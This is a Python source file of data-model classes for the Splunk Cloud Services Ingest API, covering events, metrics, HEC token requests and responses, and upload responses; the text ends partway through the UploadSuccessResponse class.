2019-08-20T17:49:27.000Z
|
2022-03-27T16:39:10.000Z
|
# Copyright © 2021 Splunk, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"): you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# [http://www.apache.org/licenses/LICENSE-2.0]
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
############# This file is auto-generated. Do not edit! #############
"""
SDC Service: Ingest API
Use the Ingest service in Splunk Cloud Services to send event and metrics data, or upload a static file, to Splunk Cloud Services.
OpenAPI spec version: v1beta2.32 (recommended default)
Generated by: https://openapi-generator.tech
"""
from datetime import datetime
from typing import List, Dict
from splunk_sdk.common.sscmodel import SSCModel
from splunk_sdk.base_client import dictify, inflate
from enum import Enum
class Error(SSCModel):
    """Generic service error payload (code, details, message)."""

    @staticmethod
    def _from_dict(model: dict) -> "Error":
        # Wrap an already-deserialized dict without re-running __init__.
        instance = Error.__new__(Error)
        instance._attrs = model
        return instance

    def __init__(self, code: "str" = None, details: "object" = None, message: "str" = None, **extra):
        """Error"""
        self._attrs = dict()
        # Only record attributes that were actually supplied.
        for name, value in (("code", code), ("details", details), ("message", message)):
            if value is not None:
                self._attrs[name] = value
        self._attrs.update(extra)

    @property
    def code(self) -> "str":
        """The error code of this Error, or None if unset."""
        return self._attrs.get("code")

    @code.setter
    def code(self, code: "str"):
        # Set the code of this Error (str).
        self._attrs["code"] = code

    @property
    def details(self) -> "dict":
        """The details object of this Error, or None if unset."""
        return self._attrs.get("details")

    @details.setter
    def details(self, details: "dict"):
        # Set the details of this Error (arbitrary JSON object).
        self._attrs["details"] = details

    @property
    def message(self) -> "str":
        """The human-readable message of this Error, or None if unset."""
        return self._attrs.get("message")

    @message.setter
    def message(self, message: "str"):
        # Set the message of this Error (str).
        self._attrs["message"] = message

    def to_dict(self):
        # Serialize, dropping attributes that are unset (None).
        return {name: value for name, value in self._attrs.items() if value is not None}
class Event(SSCModel):
    """A single ingest event: a required body plus optional routing metadata."""

    @staticmethod
    def _from_dict(model: dict) -> "Event":
        # Wrap an already-deserialized dict without re-running __init__.
        instance = Event.__new__(Event)
        instance._attrs = model
        return instance

    def __init__(self, body: "object", attributes: "Dict[str, object]" = None, host: "str" = None, id: "str" = None, nanos: "int" = None, source: "str" = None, sourcetype: "str" = None, timestamp: "int" = None, **extra):
        """Event"""
        self._attrs = dict()
        # Only record attributes that were actually supplied.
        fields = (
            ("body", body),
            ("attributes", attributes),
            ("host", host),
            ("id", id),
            ("nanos", nanos),
            ("source", source),
            ("sourcetype", sourcetype),
            ("timestamp", timestamp),
        )
        for name, value in fields:
            if value is not None:
                self._attrs[name] = value
        self._attrs.update(extra)

    @property
    def body(self) -> "object":
        """The raw event content. It can be a string, number, string array,
        number array, JSON object, map, list, a JSON array, or a byte array."""
        return self._attrs.get("body")

    @body.setter
    def body(self, body: "object"):
        # body is the one required field; reject None explicitly.
        if body is None:
            raise ValueError("Invalid value for `body`, must not be `None`")
        self._attrs["body"] = body

    @property
    def attributes(self) -> "dict":
        """JSON object with explicit custom fields to be defined at index time."""
        return self._attrs.get("attributes")

    @attributes.setter
    def attributes(self, attributes: "dict"):
        # Set the index-time custom fields (Dict[str, object]).
        self._attrs["attributes"] = attributes

    @property
    def host(self) -> "str":
        """Host value assigned to the event data; typically the sending client's hostname."""
        return self._attrs.get("host")

    @host.setter
    def host(self, host: "str"):
        # Set the host of this Event (str).
        self._attrs["host"] = host

    @property
    def id(self) -> "str":
        """Optional unique ID used to deduplicate the event; system-assigned if omitted."""
        return self._attrs.get("id")

    @id.setter
    def id(self, id: "str"):
        # Set the deduplication ID of this Event (str).
        self._attrs["id"] = id

    @property
    def nanos(self) -> "int":
        """Optional nanoseconds part of the timestamp."""
        return self._attrs.get("nanos")

    @nanos.setter
    def nanos(self, nanos: "int"):
        # Set the nanoseconds part of the timestamp (int).
        self._attrs["nanos"] = nanos

    @property
    def source(self) -> "str":
        """Source value to assign to the event data (e.g. the producing app's name)."""
        return self._attrs.get("source")

    @source.setter
    def source(self, source: "str"):
        # Set the source of this Event (str).
        self._attrs["source"] = source

    @property
    def sourcetype(self) -> "str":
        """Sourcetype value assigned to the event data."""
        return self._attrs.get("sourcetype")

    @sourcetype.setter
    def sourcetype(self, sourcetype: "str"):
        # Set the sourcetype of this Event (str).
        self._attrs["sourcetype"] = sourcetype

    @property
    def timestamp(self) -> "int":
        """Epoch time in milliseconds."""
        return self._attrs.get("timestamp")

    @timestamp.setter
    def timestamp(self, timestamp: "int"):
        # Set the epoch-millisecond timestamp (int).
        self._attrs["timestamp"] = timestamp

    def to_dict(self):
        # Serialize, dropping attributes that are unset (None).
        return {name: value for name, value in self._attrs.items() if value is not None}
class FileUploadDetails(SSCModel):
    """Details of a static-file upload (currently just the filename)."""

    @staticmethod
    def _from_dict(model: dict) -> "FileUploadDetails":
        # Wrap an already-deserialized dict without re-running __init__.
        instance = FileUploadDetails.__new__(FileUploadDetails)
        instance._attrs = model
        return instance

    def __init__(self, filename: "str" = None, **extra):
        """FileUploadDetails"""
        self._attrs = dict()
        # Only record attributes that were actually supplied.
        if filename is not None:
            self._attrs["filename"] = filename
        self._attrs.update(extra)

    @property
    def filename(self) -> "str":
        """The filename of this FileUploadDetails, or None if unset."""
        return self._attrs.get("filename")

    @filename.setter
    def filename(self, filename: "str"):
        # Set the filename of this FileUploadDetails (str).
        self._attrs["filename"] = filename

    def to_dict(self):
        # Serialize, dropping attributes that are unset (None).
        return {name: value for name, value in self._attrs.items() if value is not None}
class HECTokenAccessResponse(SSCModel):
    """Read-only view of an HEC auth token returned by the service."""

    @staticmethod
    def _from_dict(model: dict) -> "HECTokenAccessResponse":
        # Wrap an already-deserialized dict without re-running __init__.
        instance = HECTokenAccessResponse.__new__(HECTokenAccessResponse)
        instance._attrs = model
        return instance

    def __init__(self, ack_enabled: "bool" = None, allow_query_string_auth: "bool" = None, created_at: "datetime" = None, created_by: "str" = None, description: "str" = None, disabled: "bool" = None, index: "str" = None, indexes: "List[str]" = None, last_modified_at: "datetime" = None, last_modified_by: "str" = None, name: "str" = None, source: "str" = None, sourcetype: "str" = None, tenant: "str" = None, **extra):
        """HECTokenAccessResponse"""
        self._attrs = dict()
        # Only record attributes that were actually supplied.
        fields = (
            ("ack_enabled", ack_enabled),
            ("allow_query_string_auth", allow_query_string_auth),
            ("created_at", created_at),
            ("created_by", created_by),
            ("description", description),
            ("disabled", disabled),
            ("index", index),
            ("indexes", indexes),
            ("last_modified_at", last_modified_at),
            ("last_modified_by", last_modified_by),
            ("name", name),
            ("source", source),
            ("sourcetype", sourcetype),
            ("tenant", tenant),
        )
        for name_, value in fields:
            if value is not None:
                self._attrs[name_] = value
        self._attrs.update(extra)

    @property
    def ack_enabled(self) -> "bool":
        """True if events sent with the auth token should support indexer acknowledgement."""
        return self._attrs.get("ack_enabled")

    @ack_enabled.setter
    def ack_enabled(self, ack_enabled: "bool"):
        # Set ack_enabled (bool).
        self._attrs["ack_enabled"] = ack_enabled

    @property
    def allow_query_string_auth(self) -> "bool":
        """True if this token can be passed in the ingest endpoint's query parameter for auth."""
        return self._attrs.get("allow_query_string_auth")

    @allow_query_string_auth.setter
    def allow_query_string_auth(self, allow_query_string_auth: "bool"):
        # Set allow_query_string_auth (bool).
        self._attrs["allow_query_string_auth"] = allow_query_string_auth

    @property
    def created_at(self) -> "datetime":
        """Timestamp capturing when this token was created (date-time)."""
        return self._attrs.get("created_at")

    @created_at.setter
    def created_at(self, created_at: "datetime"):
        # Set created_at (datetime).
        self._attrs["created_at"] = created_at

    @property
    def created_by(self) -> "str":
        """Principal that created the token."""
        return self._attrs.get("created_by")

    @created_by.setter
    def created_by(self, created_by: "str"):
        # Set created_by (str).
        self._attrs["created_by"] = created_by

    @property
    def description(self) -> "str":
        """Optional description of the token."""
        return self._attrs.get("description")

    @description.setter
    def description(self, description: "str"):
        # Set description (str).
        self._attrs["description"] = description

    @property
    def disabled(self) -> "bool":
        """True if this auth token has been disabled and cannot be used to send events to HECv1."""
        return self._attrs.get("disabled")

    @disabled.setter
    def disabled(self, disabled: "bool"):
        # Set disabled (bool).
        self._attrs["disabled"] = disabled

    @property
    def index(self) -> "str":
        """Default value of the index field for records collected using this token."""
        return self._attrs.get("index")

    @index.setter
    def index(self, index: "str"):
        # Set index (str).
        self._attrs["index"] = index

    @property
    def indexes(self) -> "List[str]":
        """List of index names that this token is allowed to send events to."""
        return self._attrs.get("indexes")

    @indexes.setter
    def indexes(self, indexes: "List[str]"):
        # Set indexes (List[str]).
        self._attrs["indexes"] = indexes

    @property
    def last_modified_at(self) -> "datetime":
        """Timestamp capturing when this token was last modified (date-time)."""
        return self._attrs.get("last_modified_at")

    @last_modified_at.setter
    def last_modified_at(self, last_modified_at: "datetime"):
        # Set last_modified_at (datetime).
        self._attrs["last_modified_at"] = last_modified_at

    @property
    def last_modified_by(self) -> "str":
        """Principal that last modified the token."""
        return self._attrs.get("last_modified_by")

    @last_modified_by.setter
    def last_modified_by(self, last_modified_by: "str"):
        # Set last_modified_by (str).
        self._attrs["last_modified_by"] = last_modified_by

    @property
    def name(self) -> "str":
        """Name of the token (unique within the tenant that it belongs to)."""
        return self._attrs.get("name")

    @name.setter
    def name(self, name: "str"):
        # Set name (str).
        self._attrs["name"] = name

    @property
    def source(self) -> "str":
        """Default value of the source field for records collected using this token."""
        return self._attrs.get("source")

    @source.setter
    def source(self, source: "str"):
        # Set source (str).
        self._attrs["source"] = source

    @property
    def sourcetype(self) -> "str":
        """Default value of the sourcetype field for records collected using this token."""
        return self._attrs.get("sourcetype")

    @sourcetype.setter
    def sourcetype(self, sourcetype: "str"):
        # Set sourcetype (str).
        self._attrs["sourcetype"] = sourcetype

    @property
    def tenant(self) -> "str":
        """Tenant that this token belongs to."""
        return self._attrs.get("tenant")

    @tenant.setter
    def tenant(self, tenant: "str"):
        # Set tenant (str).
        self._attrs["tenant"] = tenant

    def to_dict(self):
        # Serialize, dropping attributes that are unset (None).
        return {key: value for key, value in self._attrs.items() if value is not None}
class HECTokenCreateRequest(SSCModel):
    """Request body for creating an HEC auth token; only `name` is required."""

    @staticmethod
    def _from_dict(model: dict) -> "HECTokenCreateRequest":
        # Wrap an already-deserialized dict without re-running __init__.
        instance = HECTokenCreateRequest.__new__(HECTokenCreateRequest)
        instance._attrs = model
        return instance

    def __init__(self, name: "str", ack_enabled: "bool" = None, allow_query_string_auth: "bool" = None, description: "str" = None, disabled: "bool" = None, index: "str" = None, indexes: "List[str]" = None, source: "str" = None, sourcetype: "str" = None, **extra):
        """HECTokenCreateRequest"""
        self._attrs = dict()
        # Only record attributes that were actually supplied.
        fields = (
            ("name", name),
            ("ack_enabled", ack_enabled),
            ("allow_query_string_auth", allow_query_string_auth),
            ("description", description),
            ("disabled", disabled),
            ("index", index),
            ("indexes", indexes),
            ("source", source),
            ("sourcetype", sourcetype),
        )
        for name_, value in fields:
            if value is not None:
                self._attrs[name_] = value
        self._attrs.update(extra)

    @property
    def name(self) -> "str":
        """Name of the token (unique within the tenant that it belongs to)."""
        return self._attrs.get("name")

    @name.setter
    def name(self, name: "str"):
        # name is the one required field; reject None explicitly.
        if name is None:
            raise ValueError("Invalid value for `name`, must not be `None`")
        self._attrs["name"] = name

    @property
    def ack_enabled(self) -> "bool":
        """True if events sent with the auth token should support indexer acknowledgement."""
        return self._attrs.get("ack_enabled")

    @ack_enabled.setter
    def ack_enabled(self, ack_enabled: "bool"):
        # Set ack_enabled (bool).
        self._attrs["ack_enabled"] = ack_enabled

    @property
    def allow_query_string_auth(self) -> "bool":
        """True if this token can be passed in the ingest endpoint's query parameter for auth."""
        return self._attrs.get("allow_query_string_auth")

    @allow_query_string_auth.setter
    def allow_query_string_auth(self, allow_query_string_auth: "bool"):
        # Set allow_query_string_auth (bool).
        self._attrs["allow_query_string_auth"] = allow_query_string_auth

    @property
    def description(self) -> "str":
        """Optional description of the token."""
        return self._attrs.get("description")

    @description.setter
    def description(self, description: "str"):
        # Set description (str).
        self._attrs["description"] = description

    @property
    def disabled(self) -> "bool":
        """True if this auth token has been disabled and cannot be used to send events to HECv1."""
        return self._attrs.get("disabled")

    @disabled.setter
    def disabled(self, disabled: "bool"):
        # Set disabled (bool).
        self._attrs["disabled"] = disabled

    @property
    def index(self) -> "str":
        """Default value of the index field for records collected using this token."""
        return self._attrs.get("index")

    @index.setter
    def index(self, index: "str"):
        # Set index (str).
        self._attrs["index"] = index

    @property
    def indexes(self) -> "List[str]":
        """List of index names that this token is allowed to send events to."""
        return self._attrs.get("indexes")

    @indexes.setter
    def indexes(self, indexes: "List[str]"):
        # Set indexes (List[str]).
        self._attrs["indexes"] = indexes

    @property
    def source(self) -> "str":
        """Default value of the source field for records collected using this token."""
        return self._attrs.get("source")

    @source.setter
    def source(self, source: "str"):
        # Set source (str).
        self._attrs["source"] = source

    @property
    def sourcetype(self) -> "str":
        """Default value of the sourcetype field for records collected using this token."""
        return self._attrs.get("sourcetype")

    @sourcetype.setter
    def sourcetype(self, sourcetype: "str"):
        # Set sourcetype (str).
        self._attrs["sourcetype"] = sourcetype

    def to_dict(self):
        # Serialize, dropping attributes that are unset (None).
        return {key: value for key, value in self._attrs.items() if value is not None}
class HECTokenCreateResponse(SSCModel):
    """Model of the response returned when an HEC token is created.

    Attribute values live in ``self._attrs``; every getter returns None
    when the corresponding key is absent.
    """

    @staticmethod
    def _from_dict(model: dict) -> "HECTokenCreateResponse":
        """Wrap *model* directly as an instance (no copy, no validation)."""
        instance = HECTokenCreateResponse.__new__(HECTokenCreateResponse)
        instance._attrs = model
        return instance

    def __init__(self, ack_enabled: "bool" = None, allow_query_string_auth: "bool" = None, created_at: "datetime" = None, created_by: "str" = None, description: "str" = None, disabled: "bool" = None, index: "str" = None, indexes: "List[str]" = None, last_modified_at: "datetime" = None, last_modified_by: "str" = None, name: "str" = None, source: "str" = None, sourcetype: "str" = None, tenant: "str" = None, token: "str" = None, **extra):
        """HECTokenCreateResponse

        Only arguments that are not None are stored; unrecognized keyword
        arguments are kept verbatim so server payloads round-trip.
        """
        self._attrs = {}
        # Table-driven init replaces fifteen copy-pasted `if x is not None` blocks.
        for key, value in (
            ("ack_enabled", ack_enabled),
            ("allow_query_string_auth", allow_query_string_auth),
            ("created_at", created_at),
            ("created_by", created_by),
            ("description", description),
            ("disabled", disabled),
            ("index", index),
            ("indexes", indexes),
            ("last_modified_at", last_modified_at),
            ("last_modified_by", last_modified_by),
            ("name", name),
            ("source", source),
            ("sourcetype", sourcetype),
            ("tenant", tenant),
            ("token", token),
        ):
            if value is not None:
                self._attrs[key] = value
        self._attrs.update(extra)

    @property
    def ack_enabled(self) -> "bool":
        """bool: True if events sent with the token support indexer acknowledgement."""
        return self._attrs.get("ack_enabled")

    @ack_enabled.setter
    def ack_enabled(self, ack_enabled: "bool"):
        self._attrs["ack_enabled"] = ack_enabled

    @property
    def allow_query_string_auth(self) -> "bool":
        """bool: True if the token may be passed in the ingest endpoint's query string."""
        return self._attrs.get("allow_query_string_auth")

    @allow_query_string_auth.setter
    def allow_query_string_auth(self, allow_query_string_auth: "bool"):
        self._attrs["allow_query_string_auth"] = allow_query_string_auth

    @property
    def created_at(self) -> "datetime":
        """datetime: timestamp of when this token was created."""
        return self._attrs.get("created_at")

    @created_at.setter
    def created_at(self, created_at: "datetime"):
        self._attrs["created_at"] = created_at

    @property
    def created_by(self) -> "str":
        """str: principal that created the token."""
        return self._attrs.get("created_by")

    @created_by.setter
    def created_by(self, created_by: "str"):
        self._attrs["created_by"] = created_by

    @property
    def description(self) -> "str":
        """str: optional description of the token."""
        return self._attrs.get("description")

    @description.setter
    def description(self, description: "str"):
        self._attrs["description"] = description

    @property
    def disabled(self) -> "bool":
        """bool: True if the token is disabled and cannot send events to HECv1."""
        return self._attrs.get("disabled")

    @disabled.setter
    def disabled(self, disabled: "bool"):
        self._attrs["disabled"] = disabled

    @property
    def index(self) -> "str":
        """str: default value of the index field for records collected with this token."""
        return self._attrs.get("index")

    @index.setter
    def index(self, index: "str"):
        self._attrs["index"] = index

    @property
    def indexes(self) -> "List[str]":
        """List[str]: index names this token is allowed to send events to."""
        return self._attrs.get("indexes")

    @indexes.setter
    def indexes(self, indexes: "List[str]"):
        self._attrs["indexes"] = indexes

    @property
    def last_modified_at(self) -> "datetime":
        """datetime: timestamp of when this token was last modified."""
        return self._attrs.get("last_modified_at")

    @last_modified_at.setter
    def last_modified_at(self, last_modified_at: "datetime"):
        self._attrs["last_modified_at"] = last_modified_at

    @property
    def last_modified_by(self) -> "str":
        """str: principal that last modified the token."""
        return self._attrs.get("last_modified_by")

    @last_modified_by.setter
    def last_modified_by(self, last_modified_by: "str"):
        self._attrs["last_modified_by"] = last_modified_by

    @property
    def name(self) -> "str":
        """str: token name (unique within its tenant)."""
        return self._attrs.get("name")

    @name.setter
    def name(self, name: "str"):
        self._attrs["name"] = name

    @property
    def source(self) -> "str":
        """str: default value of the source field for records collected with this token."""
        return self._attrs.get("source")

    @source.setter
    def source(self, source: "str"):
        self._attrs["source"] = source

    @property
    def sourcetype(self) -> "str":
        """str: default value of the sourcetype field for records collected with this token."""
        return self._attrs.get("sourcetype")

    @sourcetype.setter
    def sourcetype(self, sourcetype: "str"):
        self._attrs["sourcetype"] = sourcetype

    @property
    def tenant(self) -> "str":
        """str: tenant that this token belongs to."""
        return self._attrs.get("tenant")

    @tenant.setter
    def tenant(self, tenant: "str"):
        self._attrs["tenant"] = tenant

    @property
    def token(self) -> "str":
        """str: the token value itself."""
        return self._attrs.get("token")

    @token.setter
    def token(self, token: "str"):
        self._attrs["token"] = token

    def to_dict(self):
        """Return a plain dict of every attribute whose value is not None."""
        return {k: v for (k, v) in self._attrs.items() if v is not None}
class HECTokenUpdateRequest(SSCModel):
    """Model of the request body used to update an existing HEC token.

    Attribute values live in ``self._attrs``; every getter returns None
    when the corresponding key is absent.
    """

    @staticmethod
    def _from_dict(model: dict) -> "HECTokenUpdateRequest":
        """Wrap *model* directly as an instance (no copy, no validation)."""
        instance = HECTokenUpdateRequest.__new__(HECTokenUpdateRequest)
        instance._attrs = model
        return instance

    def __init__(self, ack_enabled: "bool" = None, allow_query_string_auth: "bool" = None, description: "str" = None, disabled: "bool" = None, index: "str" = None, indexes: "List[str]" = None, source: "str" = None, sourcetype: "str" = None, **extra):
        """HECTokenUpdateRequest

        Only arguments that are not None are stored; unrecognized keyword
        arguments are kept verbatim.
        """
        self._attrs = {}
        # Table-driven init replaces eight copy-pasted `if x is not None` blocks.
        for key, value in (
            ("ack_enabled", ack_enabled),
            ("allow_query_string_auth", allow_query_string_auth),
            ("description", description),
            ("disabled", disabled),
            ("index", index),
            ("indexes", indexes),
            ("source", source),
            ("sourcetype", sourcetype),
        ):
            if value is not None:
                self._attrs[key] = value
        self._attrs.update(extra)

    @property
    def ack_enabled(self) -> "bool":
        """bool: True if events sent with the token support indexer acknowledgement."""
        return self._attrs.get("ack_enabled")

    @ack_enabled.setter
    def ack_enabled(self, ack_enabled: "bool"):
        self._attrs["ack_enabled"] = ack_enabled

    @property
    def allow_query_string_auth(self) -> "bool":
        """bool: True if the token may be passed in the ingest endpoint's query string."""
        return self._attrs.get("allow_query_string_auth")

    @allow_query_string_auth.setter
    def allow_query_string_auth(self, allow_query_string_auth: "bool"):
        self._attrs["allow_query_string_auth"] = allow_query_string_auth

    @property
    def description(self) -> "str":
        """str: optional description of the token."""
        return self._attrs.get("description")

    @description.setter
    def description(self, description: "str"):
        self._attrs["description"] = description

    @property
    def disabled(self) -> "bool":
        """bool: True if the token is disabled and cannot send events to HECv1."""
        return self._attrs.get("disabled")

    @disabled.setter
    def disabled(self, disabled: "bool"):
        self._attrs["disabled"] = disabled

    @property
    def index(self) -> "str":
        """str: default value of the index field for records collected with this token."""
        return self._attrs.get("index")

    @index.setter
    def index(self, index: "str"):
        self._attrs["index"] = index

    @property
    def indexes(self) -> "List[str]":
        """List[str]: index names this token is allowed to send events to."""
        return self._attrs.get("indexes")

    @indexes.setter
    def indexes(self, indexes: "List[str]"):
        self._attrs["indexes"] = indexes

    @property
    def source(self) -> "str":
        """str: default value of the source field for records collected with this token."""
        return self._attrs.get("source")

    @source.setter
    def source(self, source: "str"):
        self._attrs["source"] = source

    @property
    def sourcetype(self) -> "str":
        """str: default value of the sourcetype field for records collected with this token."""
        return self._attrs.get("sourcetype")

    @sourcetype.setter
    def sourcetype(self, sourcetype: "str"):
        self._attrs["sourcetype"] = sourcetype

    def to_dict(self):
        """Return a plain dict of every attribute whose value is not None."""
        return {k: v for (k, v) in self._attrs.items() if v is not None}
class HTTPResponse(SSCModel):
    """Generic HTTP response envelope: status code, optional details, and message."""

    @staticmethod
    def _from_dict(model: dict) -> "HTTPResponse":
        """Wrap *model* directly as an instance (no copy, no validation)."""
        instance = HTTPResponse.__new__(HTTPResponse)
        instance._attrs = model
        return instance

    def __init__(self, code: "str" = None, details: "object" = None, message: "str" = None, **extra):
        """HTTPResponse

        Only arguments that are not None are stored; unrecognized keyword
        arguments are kept verbatim.
        """
        self._attrs = {}
        for key, value in (("code", code), ("details", details), ("message", message)):
            if value is not None:
                self._attrs[key] = value
        self._attrs.update(extra)

    @property
    def code(self) -> "str":
        """str: response code, or None when unset."""
        return self._attrs.get("code")

    @code.setter
    def code(self, code: "str"):
        self._attrs["code"] = code

    @property
    def details(self) -> "dict":
        """dict: free-form details payload, or None when unset."""
        return self._attrs.get("details")

    @details.setter
    def details(self, details: "dict"):
        self._attrs["details"] = details

    @property
    def message(self) -> "str":
        """str: human-readable message, or None when unset."""
        return self._attrs.get("message")

    @message.setter
    def message(self, message: "str"):
        self._attrs["message"] = message

    def to_dict(self):
        """Return a plain dict of every attribute whose value is not None."""
        return {k: v for (k, v) in self._attrs.items() if v is not None}
class Metric(SSCModel):
    """A single metric data point: name plus optional dimensions, type, unit, value."""

    @staticmethod
    def _from_dict(model: dict) -> "Metric":
        """Wrap *model* directly as an instance (no copy, no validation)."""
        instance = Metric.__new__(Metric)
        instance._attrs = model
        return instance

    def __init__(self, name: "str", dimensions: "Dict[str, str]" = None, type: "str" = None, unit: "str" = None, value: "float" = None, **extra):
        """Metric

        Only arguments that are not None are stored; unrecognized keyword
        arguments are kept verbatim.

        NOTE(review): `name` is required by the setter (raises ValueError on
        None) but __init__ silently drops a None name — kept as-is for
        backward compatibility; confirm whether __init__ should validate too.
        """
        self._attrs = {}
        for key, val in (
            ("name", name),
            ("dimensions", dimensions),
            ("type", type),
            ("unit", unit),
            ("value", value),
        ):
            if val is not None:
                self._attrs[key] = val
        self._attrs.update(extra)

    @property
    def name(self) -> "str":
        """str: name of the metric, e.g. CPU, Memory."""
        return self._attrs.get("name")

    @name.setter
    def name(self, name: "str"):
        # name is a required field: reject None explicitly.
        if name is None:
            raise ValueError("Invalid value for `name`, must not be `None`")
        self._attrs["name"] = name

    @property
    def dimensions(self) -> "Dict[str, str]":
        """Dict[str, str]: classification dimensions, e.g. {\"Server\": \"nginx\"}."""
        return self._attrs.get("dimensions")

    @dimensions.setter
    def dimensions(self, dimensions: "Dict[str, str]"):
        self._attrs["dimensions"] = dimensions

    @property
    def type(self) -> "str":
        """str: type of metric; default is g for gauge."""
        return self._attrs.get("type")

    @type.setter
    def type(self, type: "str"):
        self._attrs["type"] = type

    @property
    def unit(self) -> "str":
        """str: unit of the metric, e.g. percent, megabytes, seconds."""
        return self._attrs.get("unit")

    @unit.setter
    def unit(self, unit: "str"):
        self._attrs["unit"] = unit

    @property
    def value(self) -> "float":
        """float: value of the metric; defaults to 0 server-side if unspecified."""
        return self._attrs.get("value")

    @value.setter
    def value(self, value: "float"):
        self._attrs["value"] = value

    def to_dict(self):
        """Return a plain dict of every attribute whose value is not None."""
        return {k: v for (k, v) in self._attrs.items() if v is not None}
class MetricAttribute(SSCModel):
    """Defaults (dimensions, type, unit) that individual metrics inherit and may override.

    Note the storage keys are camelCase (wire format) while the Python
    attribute names are snake_case.
    """

    @staticmethod
    def _from_dict(model: dict) -> "MetricAttribute":
        """Wrap *model* directly as an instance (no copy, no validation)."""
        instance = MetricAttribute.__new__(MetricAttribute)
        instance._attrs = model
        return instance

    def __init__(self, default_dimensions: "Dict[str, str]" = None, default_type: "str" = None, default_unit: "str" = None, **extra):
        """MetricAttribute

        Only arguments that are not None are stored; unrecognized keyword
        arguments are kept verbatim.
        """
        self._attrs = {}
        for key, value in (
            ("defaultDimensions", default_dimensions),
            ("defaultType", default_type),
            ("defaultUnit", default_unit),
        ):
            if value is not None:
                self._attrs[key] = value
        self._attrs.update(extra)

    @property
    def default_dimensions(self) -> "Dict[str, str]":
        """Dict[str, str]: dimensions inherited by individual metrics (overridable)."""
        return self._attrs.get("defaultDimensions")

    @default_dimensions.setter
    def default_dimensions(self, default_dimensions: "Dict[str, str]"):
        self._attrs["defaultDimensions"] = default_dimensions

    @property
    def default_type(self) -> "str":
        """str: metric type inherited by individual metrics (overridable)."""
        return self._attrs.get("defaultType")

    @default_type.setter
    def default_type(self, default_type: "str"):
        self._attrs["defaultType"] = default_type

    @property
    def default_unit(self) -> "str":
        """str: unit inherited by individual metrics (overridable)."""
        return self._attrs.get("defaultUnit")

    @default_unit.setter
    def default_unit(self, default_unit: "str"):
        self._attrs["defaultUnit"] = default_unit

    def to_dict(self):
        """Return a plain dict of every attribute whose value is not None."""
        return {k: v for (k, v) in self._attrs.items() if v is not None}
class MetricEvent(SSCModel):
    """An ingest event carrying a batch of related metrics plus event metadata."""

    @staticmethod
    def _from_dict(model: dict) -> "MetricEvent":
        """Wrap *model* directly as an instance (no copy, no validation)."""
        instance = MetricEvent.__new__(MetricEvent)
        instance._attrs = model
        return instance

    def __init__(self, body: "List[Metric]", attributes: "MetricAttribute" = None, host: "str" = None, id: "str" = None, nanos: "int" = None, source: "str" = None, sourcetype: "str" = None, timestamp: "int" = None, **extra):
        """MetricEvent

        Only arguments that are not None are stored; unrecognized keyword
        arguments are kept verbatim.
        """
        self._attrs = {}
        # attributes is special-cased: it is stored in dict form.
        if attributes is not None:
            self._attrs["attributes"] = attributes.to_dict()
        for key, value in (
            ("body", body),
            ("host", host),
            ("id", id),
            ("nanos", nanos),
            ("source", source),
            ("sourcetype", sourcetype),
            ("timestamp", timestamp),
        ):
            if value is not None:
                self._attrs[key] = value
        self._attrs.update(extra)

    @property
    def body(self) -> "List[Metric]":
        """List[Metric]: the related metrics in this event (required field).

        NOTE(review): raises TypeError if "body" is absent (e.g. built via
        _from_dict without it) — kept, since body is required.
        """
        return [Metric._from_dict(i) for i in self._attrs.get("body")]

    @body.setter
    def body(self, body: "List[Metric]"):
        # body is a required field: reject None explicitly.
        if body is None:
            raise ValueError("Invalid value for `body`, must not be `None`")
        self._attrs["body"] = body

    @property
    def attributes(self) -> "MetricAttribute":
        """MetricAttribute defaults for this event, or None when unset.

        Fix: previously indexed self._attrs["attributes"] directly and raised
        KeyError when the optional field was absent, inconsistent with every
        other getter in this model; now returns None instead.
        """
        raw = self._attrs.get("attributes")
        return None if raw is None else MetricAttribute._from_dict(raw)

    @attributes.setter
    def attributes(self, attributes: "MetricAttribute"):
        self._attrs["attributes"] = attributes.to_dict()

    @property
    def host(self) -> "str":
        """str: host assigned to the event data, typically the sending client's hostname."""
        return self._attrs.get("host")

    @host.setter
    def host(self, host: "str"):
        self._attrs["host"] = host

    @property
    def id(self) -> "str":
        """str: optional unique ID used to deduplicate data; system-assigned if omitted."""
        return self._attrs.get("id")

    @id.setter
    def id(self, id: "str"):
        self._attrs["id"] = id

    @property
    def nanos(self) -> "int":
        """int: optional nanoseconds part of the timestamp."""
        return self._attrs.get("nanos")

    @nanos.setter
    def nanos(self, nanos: "int"):
        self._attrs["nanos"] = nanos

    @property
    def source(self) -> "str":
        """str: source to assign to the event data, e.g. the sending app's name."""
        return self._attrs.get("source")

    @source.setter
    def source(self, source: "str"):
        self._attrs["source"] = source

    @property
    def sourcetype(self) -> "str":
        """str: sourcetype assigned to the event data."""
        return self._attrs.get("sourcetype")

    @sourcetype.setter
    def sourcetype(self, sourcetype: "str"):
        self._attrs["sourcetype"] = sourcetype

    @property
    def timestamp(self) -> "int":
        """int: epoch time in milliseconds."""
        return self._attrs.get("timestamp")

    @timestamp.setter
    def timestamp(self, timestamp: "int"):
        self._attrs["timestamp"] = timestamp

    def to_dict(self):
        """Return a plain dict of every attribute whose value is not None."""
        return {k: v for (k, v) in self._attrs.items() if v is not None}
class UploadSuccessResponse(SSCModel):
    """Response returned after a successful file upload: code, details, message."""

    @staticmethod
    def _from_dict(model: dict) -> "UploadSuccessResponse":
        """Wrap *model* directly as an instance (no copy, no validation)."""
        instance = UploadSuccessResponse.__new__(UploadSuccessResponse)
        instance._attrs = model
        return instance

    def __init__(self, code: "str" = None, details: "FileUploadDetails" = None, message: "str" = None, **extra):
        """UploadSuccessResponse

        Only arguments that are not None are stored; unrecognized keyword
        arguments are kept verbatim. `details` is stored in dict form.
        """
        self._attrs = {}
        if code is not None:
            self._attrs["code"] = code
        if details is not None:
            self._attrs["details"] = details.to_dict()
        if message is not None:
            self._attrs["message"] = message
        self._attrs.update(extra)

    @property
    def code(self) -> "str":
        """str: response code, or None when unset."""
        return self._attrs.get("code")

    @code.setter
    def code(self, code: "str"):
        self._attrs["code"] = code

    @property
    def details(self) -> "FileUploadDetails":
        """FileUploadDetails for the upload, or None when unset.

        Fix: previously indexed self._attrs["details"] directly and raised
        KeyError when the optional field was absent, inconsistent with the
        other getters; now returns None instead.
        """
        raw = self._attrs.get("details")
        return None if raw is None else FileUploadDetails._from_dict(raw)

